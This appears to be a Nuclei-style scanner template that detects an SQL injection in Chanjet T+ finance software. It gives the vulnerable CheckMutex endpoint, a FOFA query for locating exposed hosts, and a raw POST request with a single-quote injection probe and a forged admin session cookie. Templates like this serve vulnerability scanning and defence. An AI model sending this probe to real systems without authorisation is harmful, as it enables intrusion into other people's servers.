id: chanjet-tplus-checkmutex-sqli info: name: Chanjet Tplus CheckMutex - SQL Injection author: unknown severity: high description: | There is an SQL injection vulnerability in the Changjetcrm financial crm system under Yonyou. reference: - https://github.com/MrWQ/vulnerability-paper/blob/7551f7584bd35039028b1d9473a00201ed18e6b2/bugs/%E3%80%90%E6%BC%8F%E6%B4%9E%E5%A4%8D%E7%8E%B0%E3%80%91%E7%94%A8%E5%8F%8B%E7%95%85%E6%8D%B7%E9%80%9A%20T%2B%20SQL%20%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E.md metadata: max-request: 1 fofa-query: app="畅捷通-TPlus" verified: true tags: chanjettplus,sqli http: - raw: - | POST /tplus/ajaxpro/Ufida.T.SM.UIP.MultiCompanyController,Ufida.T.SM.UIP.ashx?method=CheckMutex HTTP/1.1 Host: {{Hostname}} Content-Type: text/plain Cookie: ASP.NET_SessionId=; sid=admin {"accNum": "6'", "functionTag": "SYS0104", "url": ""} matchers: - type: word part: body words: - "order by begintime" - type: status status: - 200